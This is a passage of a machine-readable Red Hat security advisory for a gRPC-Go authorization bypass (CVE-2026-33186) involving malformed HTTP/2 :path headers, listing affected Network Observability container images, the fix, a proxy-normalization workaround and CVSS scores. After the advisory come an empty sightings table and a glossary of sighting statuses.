"text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "RHBZ#2449833",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
"url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
}
],
"release_date": "2026-03-20T22:23:32.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.